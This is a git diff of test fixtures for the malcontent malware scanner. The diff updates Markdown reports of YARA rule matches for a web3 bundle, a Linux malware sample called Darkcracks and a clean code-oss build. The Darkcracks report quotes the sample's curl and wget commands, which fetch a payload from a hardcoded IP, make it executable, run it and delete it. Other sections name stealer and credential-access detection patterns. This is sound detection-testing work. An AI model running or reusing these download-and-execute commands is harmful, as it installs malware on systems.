[eBe\(826\)](https://github.com/search?q=eBe%28826%29&type=code)
[eBe\(827\)](https://github.com/search?q=eBe%28827%29&type=code)
[eBe\(828\)](https://github.com/search?q=eBe%28828%29&type=code)
[eBe\(829\)](https://github.com/search?q=eBe%28829%29&type=code)
[eBe\(-1\)](https://github.com/search?q=eBe%28-1%29&type=code)
[eBe\(-2\)](https://github.com/search?q=eBe%28-2%29&type=code)
[eBe\(-3\)](https://github.com/search?q=eBe%28-3%29&type=code)
[eBe\(-4\)](https://github.com/search?q=eBe%28-4%29&type=code)
[eBe\(-5\)](https://github.com/search?q=eBe%28-5%29&type=code)
[eBe\(-6\)](https://github.com/search?q=eBe%28-6%29&type=code)
[eBe\(-7\)](https://github.com/search?q=eBe%28-7%29&type=code)
[eBe\(-8\)](https://github.com/search?q=eBe%28-8%29&type=code)
[eBe\(-9\)](https://github.com/search?q=eBe%28-9%29&type=code)
[eBe\(10\)](https://github.com/search?q=eBe%2810%29&type=code)
[eBe\(11\)](https://github.com/search?q=eBe%2811%29&type=code)
[eBe\(12\)](https://github.com/search?q=eBe%2812%29&type=code)
[eBe\(13\)](https://github.com/search?q=eBe%2813%29&type=code)
[eBe\(14\)](https://github.com/search?q=eBe%2814%29&type=code)
[eBe\(15\)](https://github.com/search?q=eBe%2815%29&type=code)
[eBe\(16\)](https://github.com/search?q=eBe%2816%29&type=code)
[eBe\(17\)](https://github.com/search?q=eBe%2817%29&type=code)
[eBe\(18\)](https://github.com/search?q=eBe%2818%29&type=code)
[eBe\(19\)](https://github.com/search?q=eBe%2819%29&type=code)
[eBe\(20\)](https://github.com/search?q=eBe%2820%29&type=code)
[eBe\(21\)](https://github.com/search?q=eBe%2821%29&type=code)
[eBe\(22\)](https://github.com/search?q=eBe%2822%29&type=code)
[eBe\(23\)](https://github.com/search?q=eBe%2823%29&type=code)
[eBe\(24\)](https://github.com/search?q=eBe%2824%29&type=code)
[eBe\(25\)](https://github.com/search?q=eBe%2825%29&type=code)
[eBe\(26\)](https://github.com/search?q=eBe%2826%29&type=code)
[eBe\(27\)](https://github.com/search?q=eBe%2827%29&type=code)
[eBe\(28\)](https://github.com/search?q=eBe%2828%29&type=code)
[eBe\(29\)](https://github.com/search?q=eBe%2829%29&type=code)
[eBe\(30\)](https://github.com/search?q=eBe%2830%29&type=code)
[eBe\(31\)](https://github.com/search?q=eBe%2831%29&type=code)
[eBe\(32\)](https://github.com/search?q=eBe%2832%29&type=code)
[eBe\(33\)](https://github.com/search?q=eBe%2833%29&type=code)
[eBe\(34\)](https://github.com/search?q=eBe%2834%29&type=code)
[eBe\(35\)](https://github.com/search?q=eBe%2835%29&type=code)
[eBe\(36\)](https://github.com/search?q=eBe%2836%29&type=code)
[eBe\(37\)](https://github.com/search?q=eBe%2837%29&type=code)
[eBe\(38\)](https://github.com/search?q=eBe%2838%29&type=code)
[eBe\(39\)](https://github.com/search?q=eBe%2839%29&type=code)
[eBe\(40\)](https://github.com/search?q=eBe%2840%29&type=code)
[eBe\(41\)](https://github.com/search?q=eBe%2841%29&type=code)
[eBe\(42\)](https://github.com/search?q=eBe%2842%29&type=code)
[eBe\(43\)](https://github.com/search?q=eBe%2843%29&type=code)
[eBe\(44\)](https://github.com/search?q=eBe%2844%29&type=code)
[eBe\(45\)](https://github.com/search?q=eBe%2845%29&type=code)
[eBe\(46\)](https://github.com/search?q=eBe%2846%29&type=code)
[eBe\(47\)](https://github.com/search?q=eBe%2847%29&type=code)
[eBe\(48\)](https://github.com/search?q=eBe%2848%29&type=code)
[eBe\(49\)](https://github.com/search?q=eBe%2849%29&type=code)
[eBe\(50\)](https://github.com/search?q=eBe%2850%29&type=code)
[eBe\(51\)](https://github.com/search?q=eBe%2851%29&type=code)
[eBe\(52\)](https://github.com/search?q=eBe%2852%29&type=code)
[eBe\(53\)](https://github.com/search?q=eBe%2853%29&type=code)
[eBe\(54\)](https://github.com/search?q=eBe%2854%29&type=code)
[eBe\(55\)](https://github.com/search?q=eBe%2855%29&type=code)
[eBe\(56\)](https://github.com/search?q=eBe%2856%29&type=code)
[eBe\(57\)](https://github.com/search?q=eBe%2857%29&type=code)
[eBe\(58\)](https://github.com/search?q=eBe%2858%29&type=code)
[eBe\(59\)](https://github.com/search?q=eBe%2859%29&type=code)
[eBe\(60\)](https://github.com/search?q=eBe%2860%29&type=code)
[eBe\(61\)](https://github.com/search?q=eBe%2861%29&type=code)
[eBe\(62\)](https://github.com/search?q=eBe%2862%29&type=code)
[eBe\(63\)](https://github.com/search?q=eBe%2863%29&type=code)
[eBe\(64\)](https://github.com/search?q=eBe%2864%29&type=code)
[eBe\(65\)](https://github.com/search?q=eBe%2865%29&type=code)
[eBe\(66\)](https://github.com/search?q=eBe%2866%29&type=code)
[eBe\(67\)](https://github.com/search?q=eBe%2867%29&type=code)
[eBe\(68\)](https://github.com/search?q=eBe%2868%29&type=code)
[eBe\(69\)](https://github.com/search?q=eBe%2869%29&type=code)
[eBe\(70\)](https://github.com/search?q=eBe%2870%29&type=code)
[eBe\(71\)](https://github.com/search?q=eBe%2871%29&type=code)
[eBe\(72\)](https://github.com/search?q=eBe%2872%29&type=code)
[eBe\(73\)](https://github.com/search?q=eBe%2873%29&type=code)
[eBe\(74\)](https://github.com/search?q=eBe%2874%29&type=code)
[eBe\(75\)](https://github.com/search?q=eBe%2875%29&type=code)
[eBe\(76\)](https://github.com/search?q=eBe%2876%29&type=code)
[eBe\(77\)](https://github.com/search?q=eBe%2877%29&type=code)
[eBe\(78\)](https://github.com/search?q=eBe%2878%29&type=code)
[eBe\(79\)](https://github.com/search?q=eBe%2879%29&type=code)
[eBe\(80\)](https://github.com/search?q=eBe%2880%29&type=code)
[eBe\(81\)](https://github.com/search?q=eBe%2881%29&type=code)
[eBe\(82\)](https://github.com/search?q=eBe%2882%29&type=code)
[eBe\(83\)](https://github.com/search?q=eBe%2883%29&type=code)
[eBe\(84\)](https://github.com/search?q=eBe%2884%29&type=code)
[eBe\(85\)](https://github.com/search?q=eBe%2885%29&type=code)
[eBe\(86\)](https://github.com/search?q=eBe%2886%29&type=code)
[eBe\(87\)](https://github.com/search?q=eBe%2887%29&type=code)
[eBe\(88\)](https://github.com/search?q=eBe%2888%29&type=code)
[eBe\(89\)](https://github.com/search?q=eBe%2889%29&type=code)
[eBe\(90\)](https://github.com/search?q=eBe%2890%29&type=code)
[eBe\(91\)](https://github.com/search?q=eBe%2891%29&type=code)
[eBe\(92\)](https://github.com/search?q=eBe%2892%29&type=code)
[eBe\(93\)](https://github.com/search?q=eBe%2893%29&type=code)
[eBe\(94\)](https://github.com/search?q=eBe%2894%29&type=code)
[eBe\(95\)](https://github.com/search?q=eBe%2895%29&type=code)
[eBe\(96\)](https://github.com/search?q=eBe%2896%29&type=code)
[eBe\(97\)](https://github.com/search?q=eBe%2897%29&type=code)
[eBe\(98\)](https://github.com/search?q=eBe%2898%29&type=code)
[eBe\(99\)](https://github.com/search?q=eBe%2899%29&type=code)
[eBe\(0\)](https://github.com/search?q=eBe%280%29&type=code)
[eBe\(1\)](https://github.com/search?q=eBe%281%29&type=code)
[eBe\(2\)](https://github.com/search?q=eBe%282%29&type=code)
[eBe\(3\)](https://github.com/search?q=eBe%283%29&type=code)
[eBe\(4\)](https://github.com/search?q=eBe%284%29&type=code)
[eBe\(5\)](https://github.com/search?q=eBe%285%29&type=code)
[eBe\(6\)](https://github.com/search?q=eBe%286%29&type=code)
[eBe\(7\)](https://github.com/search?q=eBe%287%29&type=code)
[eBe\(8\)](https://github.com/search?q=eBe%288%29&type=code)
[eBe\(9\)](https://github.com/search?q=eBe%289%29&type=code) | +| +HIGH | **[c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#exotic_tld)** | Contains HTTP hostname with unusual top-level domain | [https://api.mantlescan.xyz/](https%3A%2F%2Fapi.mantlescan.xyz%2F)
[https://mantlescan.xyz/](https%3A%2F%2Fmantlescan.xyz%2F)
[https://openchain.xyz/](https%3A%2F%2Fopenchain.xyz%2F) | | +HIGH | **[data/builtin/appkit](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/builtin/appkit.yara#appkit)** | Includes AppKit, a web3 blockchain library | [Price impact reflects the change in market price due to your trade](https://github.com/search?q=Price+impact+reflects+the+change+in+market+price+due+to+your+trade&type=code)
[Select which chain to connect to your multi](https://github.com/search?q=Select+which+chain+to+connect+to+your+multi&type=code) | | +MEDIUM | **[anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#long_hex_var)** | contains a large hexadecimal string variable | [Zc="0x608060405234801561001057600080fd5b506040516102c03803806102c083398101604081905261002f916101e6565b836001600160a01b03163b6000036100e457600080836001600160a01b03168360405161005c9190610270565b6000604051808303816000865af19150503d8060008114610099576040519150601f19603f3d011682016040523d82523d6000602084013e61009e565b606091505b50915091508115806100b857506001600160a01b0386163b155b156100e1578060405163101bb98d60e01b81526004016100d8919061028c565b60405180910390fd5b50505b6000808451602086016000885af16040513d6000823e81610103573d81fd5b3d81f35b80516001600160a01b038116811461011e57600080fd5b919050565b634e487b7160e01b600052604160045260246000fd5b60005b8381101561015457818101518382015260200161013c565b50506000910152565b600082601f83011261016e57600080fd5b81516001600160401b0381111561018757610187610123565b604051601f8201601f19908116603f011681016001600160401b03811182821017156101b5576101b5610123565b6040528181528382016020018510156101cd57600080fd5b6101de826020830160208701610139565b949350505050565b600080600080608085870312156101fc57600080fd5b6102](https://github.com/search?q=Zc%3D%220x608060405234801561001057600080fd5b506040516102c03803806102c083398101604081905261002f916101e6565b836001600160a01b03163b6000036100e457600080836001600160a01b03168360405161005c9190610270565b6000604051808303816000865af19150503d8060008114610099576040519150601f19603f3d011682016040523d82523d6000602084013e61009e565b606091505b50915091508115806100b857506001600160a01b0386163b155b156100e1578060405163101bb98d60e01b81526004016100d8919061028c565b60405180910390fd5b50505b6000808451602086016000885af16040513d6000823e81610103573d81fd5b3d81f35b80516001600160a01b038116811461011e57600080fd5b919050565b634e487b7160e01b600052604160045260246000fd5b60005b8381101561015457818101518382015260200161013c565b50506000910152565b600082601f83011261016e57600080fd5b81516001600160401b0381111561018757610187610123565b604051601f8201601f19908116603f011681016001600160401b03811182821017156101b5576101b5610123565b6040528181528382016020018510156101cd57600080fd5b6101de826020830160208701610139565b949350505050565b600080600080608085870312156101fc57600080fd5b6102&type=code) | | +MEDIUM | **[c2/addr/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/discord.yara#discord)** | may report back to 'Discord' | [Discord](https://github.com/search?q=Discord&type=code) | | +MEDIUM | **[c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID)** | contains a client ID | [client_id](https://github.com/search?q=client_id&type=code)
[clientId](https://github.com/search?q=clientId&type=code) | -| +MEDIUM | **[c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref)** | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code) | +| +MEDIUM | **[c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref)** | references multiple operating systems | [https://](https%3A%2F%2F)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http%3A%2F%2F)
[windows](https://github.com/search?q=windows&type=code)
[Linux](https://github.com/search?q=Linux&type=code)
[linux](https://github.com/search?q=linux&type=code) | | +MEDIUM | **[collect/localstorage](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/localstorage.yara#localstorage)** | accesses browser local storage | [localStorage.get](https://github.com/search?q=localStorage.get&type=code) | | +MEDIUM | **[credential/keychain](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/keychain/keychain.yara#keychain)** | accesses a keychain | [keychain](https://github.com/search?q=keychain&type=code) | | +MEDIUM | **[crypto/blockchain](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/blockchain.yara#blockchain)** | Uses a blockchain | [blockchain](https://github.com/search?q=blockchain&type=code) | | +MEDIUM | **[crypto/cipher](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/cipher.yara#ciphertext)** | mentions 'ciphertext' | [ciphertext](https://github.com/search?q=ciphertext&type=code) | | +MEDIUM | **[crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user)** | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code) | | +MEDIUM | **[crypto/uuid](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/uuid.yara#random_uuid)** | generates a random UUID | [randomUUID](https://github.com/search?q=randomUUID&type=code) | -| +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#js_base64_decode)** | decode base64 strings | [js_base64_decode::atob(](https://github.com/search?q=js_base64_decode%3A%3Aatob%28&type=code) | +| +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#js_base64_decode)** | decode base64 strings | [js_base64_decode::atob\(](https://github.com/search?q=js_base64_decode%3A%3Aatob%28&type=code) | | +MEDIUM | **[data/embedded/base64_url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-base64-url.yara#contains_base64_url)** | Contains base64 url | [contains_base64_url::odHRwOi8v](https://github.com/search?q=contains_base64_url%3A%3AodHRwOi8v&type=code) | | +MEDIUM | **[discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#npm_uname)** | [get system identification](https://nodejs.org/api/process.html) | [process.platform](https://github.com/search?q=process.platform&type=code)
[process.versions](https://github.com/search?q=process.versions&type=code) | | +MEDIUM | **[exfil/stealer/browser](https://github.com/chainguard-dev/malcontent/blob/main/rules/exfil/stealer/browser.yara#userdata_browser_archiver)** | Uses HTTP, archives, and references multiple browsers | [.config](https://github.com/search?q=.config&type=code)
[Discord](https://github.com/search?q=Discord&type=code)
[Firefox](https://github.com/search?q=Firefox&type=code)
[Chrome](https://github.com/search?q=Chrome&type=code)
[Safari](https://github.com/search?q=Safari&type=code)
[Brave](https://github.com/search?q=Brave&type=code)
[Opera](https://github.com/search?q=Opera&type=code)
[https](https://github.com/search?q=https&type=code)
[POST](https://github.com/search?q=POST&type=code)
[zip](https://github.com/search?q=zip&type=code) | @@ -35,7 +35,7 @@ | +MEDIUM | **[net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr)** | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code)
[ipAddr](https://github.com/search?q=ipAddr&type=code) | | +MEDIUM | **[net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen)** | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[socket](https://github.com/search?q=socket&type=code) | | +MEDIUM | **[net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode)** | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | -| +MEDIUM | **[net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls)** | requests resources via URL | [requests.get(e)](https://github.com/search?q=requests.get%28e%29&type=code)
[openURL](https://github.com/search?q=openURL&type=code) | +| +MEDIUM | **[net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls)** | requests resources via URL | [requests.get\(e\)](https://github.com/search?q=requests.get%28e%29&type=code)
[openURL](https://github.com/search?q=openURL&type=code) | | +MEDIUM | **[net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer)** | makes outgoing WebRTC connections, uses blockchain | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | | +LOW | **[credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password)** | references a 'password' | [to countless passwords](https://github.com/search?q=to+countless+passwords&type=code)
[PasswordBasedCipher](https://github.com/search?q=PasswordBasedCipher&type=code) | | +LOW | **[credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val)** | References private keys | [privateKey](https://github.com/search?q=privateKey&type=code) | @@ -46,20 +46,20 @@ | +LOW | **[crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key)** | references a 'public key' | [Public key](https://github.com/search?q=Public+key&type=code)
[public key](https://github.com/search?q=public+key&type=code)
[PublicKey](https://github.com/search?q=PublicKey&type=code)
[publicKey](https://github.com/search?q=publicKey&type=code) | | +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | +LOW | **[data/encoding/qr_code](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/qr_code.yara#qr_code)** | works with QR Codes | [QR Code](https://github.com/search?q=QR+Code&type=code) | -| +LOW | **[fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open)** | opens files | [open(](https://github.com/search?q=open%28&type=code) | +| +LOW | **[fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open)** | opens files | [open\(](https://github.com/search?q=open%28&type=code) | | +LOW | **[fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount)** | mounts file systems | [mount](https://github.com/search?q=mount&type=code)
[-o](https://github.com/search?q=-o&type=code) | | +LOW | **[net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_json)** | accepts JSON files via HTTP | [application/json](https://github.com/search?q=application%2Fjson&type=code)
[Accept](https://github.com/search?q=Accept&type=code) | | +LOW | **[net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo)** | Network address and service translation | [getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | | +LOW | **[net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg)** | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [_send](https://github.com/search?q=_send&type=code) | | +LOW | **[os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#get_env_val)** | Retrieve environment variable values | [env.NEXT_PUBLIC_DEFA](https://github.com/search?q=env.NEXT_PUBLIC_DEFA&type=code)
[env.NEXT_PUBLIC_SECU](https://github.com/search?q=env.NEXT_PUBLIC_SECU&type=code)
[env.NODE_DEBUG](https://github.com/search?q=env.NODE_DEBUG&type=code)
[env.IS_VITEST](https://github.com/search?q=env.IS_VITEST&type=code)
[env.DEBUG](https://github.com/search?q=env.DEBUG&type=code)
[env.MODE](https://github.com/search?q=env.MODE&type=code) | -| +LOW | **[os/fd/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read)** | reads from a file handle | [e.read()](https://github.com/search?q=e.read%28%29&type=code) | -| +LOW | **[os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write)** | writes to a file handle | [decoder.write(n)](https://github.com/search?q=decoder.write%28n%29&type=code)
[decoder.write(t)](https://github.com/search?q=decoder.write%28t%29&type=code)
[this.write(e)](https://github.com/search?q=this.write%28e%29&type=code)
[a.write(o)](https://github.com/search?q=a.write%28o%29&type=code)
[e.write(t)](https://github.com/search?q=e.write%28t%29&type=code)
[i.write(e)](https://github.com/search?q=i.write%28e%29&type=code)
[t.write(o)](https://github.com/search?q=t.write%28o%29&type=code) | +| +LOW | **[os/fd/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read)** | reads from a file handle | [e.read\(\)](https://github.com/search?q=e.read%28%29&type=code) | +| +LOW | **[os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write)** | writes to a file handle | [decoder.write\(n\)](https://github.com/search?q=decoder.write%28n%29&type=code)
[decoder.write\(t\)](https://github.com/search?q=decoder.write%28t%29&type=code)
[this.write\(e\)](https://github.com/search?q=this.write%28e%29&type=code)
[a.write\(o\)](https://github.com/search?q=a.write%28o%29&type=code)
[e.write\(t\)](https://github.com/search?q=e.write%28t%29&type=code)
[i.write\(e\)](https://github.com/search?q=i.write%28e%29&type=code)
[t.write\(o\)](https://github.com/search?q=t.write%28o%29&type=code) | ### 3 removed behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | |:--|:--|:--|:--| | -MEDIUM | [data/encoding/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/url.yara#decode_uri_component) | decodes URL components | [decodeURIComponent](https://github.com/search?q=decodeURIComponent&type=code) | -| -MEDIUM | [exec/remote_commands/code_eval](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/remote_commands/code_eval.yara#js_eval) | evaluate code dynamically using eval() | [eval("](https://github.com/search?q=eval%28%22&type=code) | -| -MEDIUM | [os/time/clock_sleep](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/time/clock-sleep.yara#setInterval) | uses setInterval to wait | [setInterval(](https://github.com/search?q=setInterval%28&type=code) | +| -MEDIUM | [exec/remote_commands/code_eval](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/remote_commands/code_eval.yara#js_eval) | evaluate code dynamically using eval() | [eval\("](https://github.com/search?q=eval%28%22&type=code) | +| -MEDIUM | [os/time/clock_sleep](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/time/clock-sleep.yara#setInterval) | uses setInterval to wait | [setInterval\(](https://github.com/search?q=setInterval%28&type=code) | diff --git a/tests/linux/2024.Darkcracks/darkcracks.sh.md b/tests/linux/2024.Darkcracks/darkcracks.sh.md index b006195e3..52678d75f 100644 --- a/tests/linux/2024.Darkcracks/darkcracks.sh.md +++ b/tests/linux/2024.Darkcracks/darkcracks.sh.md @@ -5,7 +5,7 @@ | CRITICAL | [evasion/file/location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /;](https://github.com/search?q=cd+%2F%3B&type=code) | | CRITICAL | [evasion/self_deletion/run_and_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_and_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) | | CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) | -| HIGH | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl)
[http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v](http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v) | +| HIGH | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/pQ1iM9hd-x64-musl](http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2FpQ1iM9hd-x64-musl)
[http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v](http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v) | | HIGH | [c2/tool_transfer/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/shell.yara#tool_chmod_relative_run_tiny) | fetch file, make it executable, and run it | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code)
[wget http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -O agr](https://github.com/search?q=wget+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-O+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[./agr](https://github.com/search?q=.%2Fagr&type=code) | | MEDIUM | [exec/shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/exec.yara#calls_shell) | executes shell | [/bin/bash](https://github.com/search?q=%2Fbin%2Fbash&type=code) | | MEDIUM | [fs/file/make_executable](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-make_executable.yara#chmod_executable_shell) | makes file executable | [chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code) | @@ -14,6 +14,6 @@ | MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | | LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run](https://github.com/search?q=%2Fvar%2Frun&type=code) | | LOW | [net/http](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http) | Uses the HTTP protocol | [http](https://github.com/search?q=http&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url) | contains embedded HTTP URLs | [http://179.191.68.85](http://179.191.68.85) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#http_url) | contains embedded HTTP URLs | [http://179.191.68.85](http%3A%2F%2F179.191.68.85) | | LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code) | diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md index c862fa9e4..e6f18e73c 100644 --- a/tests/linux/clean/code-oss.md +++ b/tests/linux/clean/code-oss.md @@ -6,27 +6,27 @@ | MEDIUM | [anti-behavior/LD_PROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_PROFILE.yara#env_LD_PROFILE) | may check if dynamic linker profiling is enabled | [LD_PROFILE](https://github.com/search?q=LD_PROFILE&type=code) | | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)
[VMware](https://github.com/search?q=VMware&type=code) | | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | -| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%s](http://%s) | +| MEDIUM | [c2/addr/http_dynamic](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/http-dynamic.yara#http_dynamic) | URL that is dynamically generated | [http://%s](http%3A%2F%2F%25s) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [internalPort](https://github.com/search?q=internalPort&type=code)
[message_port](https://github.com/search?q=message_port&type=code)
[validatePort](https://github.com/search?q=validatePort&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[inspectPort](https://github.com/search?q=inspectPort&type=code)
[messagePort](https://github.com/search?q=messagePort&type=code)
[origin_port](https://github.com/search?q=origin_port&type=code)
